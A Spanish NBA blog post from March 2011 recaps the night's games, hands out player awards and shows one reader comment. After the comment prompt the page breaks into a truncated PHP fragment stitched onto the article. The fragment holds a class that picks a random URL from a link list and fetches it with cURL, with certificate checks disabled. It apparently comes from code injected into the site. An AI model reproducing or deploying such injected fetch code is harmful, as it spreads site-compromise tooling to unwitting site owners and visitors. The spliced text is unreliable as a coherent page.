La Crónica (05/03/2011)

06 de March de 2011 por txusma

Hoy era uno de esos días en la NBA en los que en realidad estás más pendiente de los partidos del día siguiente que de los que se han de jugar y es que esta noche podremos disfrutar de un par de duelos de nivel: Un Bulls-Heat en perfecto horario para visualizarlo en España, y un Lakers-Spurs. Con este menú, ¿quien puede mostrar interés en un Raptors-Nets o un Wolves-Wizards? De todas maneras, el lema es “a caballo regalado no le mires el dentado” así que ofrezca lo que nos ofrezca la programación de la NBA, disfrutémosla.

Y es que siempre se pueden encontrar detalles interesantes sea cual sea el partido. El Raptors-Nets celebrado en Londres tuvo hasta 3 prórrogas con victoria final de Deron Williams y compañía (136-137). Brook Lopez y Andrea Bargnani protagonizaron una lucha titánica bajo los tableros aprovechando los 3 tiempos extras para conseguir ambos dobles figuras en rebotes. 8 puntos consecutivos de Travis Outlaw en la última prórroga amarraron la victoria para los Nets.

Ayer también pudimos descubrir también a Trevor Booker, un rookie que poco a poco le va robando minutos a Javale “yo machaco 3 balones a la vez” McGee. Ayer se retiró al principio del partido frente los Wolves con algún tipo de lesión pero volvió a tiempo de ser fundamental en el último cuarto con 3 jugadas consecutivas espectaculares. Capitaneados por Wall y Blatche, los Wizards se llevaron la victoria ante un equipo donde sólo Kevin Love parece dar señales de vida (96-103). Anoche consiguió su doble-doble número 50 y se queda a 1 sólo del récord absoluto de Moses Malones.

Lo que sí había anoche era una interesante lucha por los últimos puestos del playoffs del Oeste. A Portland no le costó nada deshacerse de unos patéticos Bobcats que no llegaron a 69 puntos en un partido en que lo más destacado fue ver a Gerald Wallace enfrentarse a su ex-equipo (69-93). Utah, en cambio, tuvo muchísimos problemas para vencer en  el Energy Solutions Arena a los Kings y romper así su racha de 7 partidos consecutivos en casa perdiendo. La baja de Paul Millsap jugaba en su contra pero Al Jefferson y Raja Bell certificaron en la prórroga la victoria (102-109).  Finalmente, Rockets y Nuggets, tuvieron suerte desigual. Los primeros salieron concienciados de que entran en una fase de la temporada en la que no se pueden permitir más tropiezos si quieren seguir optando a los post-temporada y no dieron ninguna opción a los Pacers (95-112). Los segundos cayeron ante los Clippers cuando se las prometían felices por una nueva lesión de Eric Gordon, que le deja fuera de combate por tiempo indeterminado (94-100). No contaban con un Eric Bledsoe que apareció de la nada para amargarles la noche con 7 robos.

PREMIOS

MVP: 34 puntos, 14 rebotes y 8 tapones para Brook Lopez, eso sí, tras 3 prórrogas. Deron Williams aprovechó el mismo partido para irse a los 21 puntos, 18 asistencias y Al Jefferson sólo necesito un tiempo extra para lograr 27 puntos, 7 rebotes, 4 asistencias y 2 tapones.

Rookie: Se han portado muy bien los rookies hoy. Griffin, Wall y Cousins, cerquita del triple doble con 18-12-9 el primero,  18-11-8 el segundo y 18-18-7 el tercero. Ed Davis, con 12 puntos y 15 rebotes, y Eric Bledsoe, 20 puntos y 7 robos, también tuvieron actuaciones destacadas.

Sorpresa: Sin duda, el retorno de Francisco Garcia. Tras perderse 21 partidos volvió para anotar 18 puntos. En breve, volverá a ser el titular.

Decepción: Hace poco le dimos el premio a los Bobcats por caer de 40 puntos y hoy se lo damos por no llegar ni a los 70 puntos… Penita.

Esfuerzo en vano: Con 3 prórrogas estaba claro que el premio debía ser para un jugador de los Raptors pero no ha sido de manera clara. Andrea Bargnani fue el mejor de su equipo con 35 puntos y 12 rebotes pero en 20 minutos menos Nene Hilario consiguió 25 puntos, 14 rebotes y 2 tapones…

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. Cocinitas dice:
    #1

    Carlos Arroyo a punto de firmar por los Boston Celtics.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>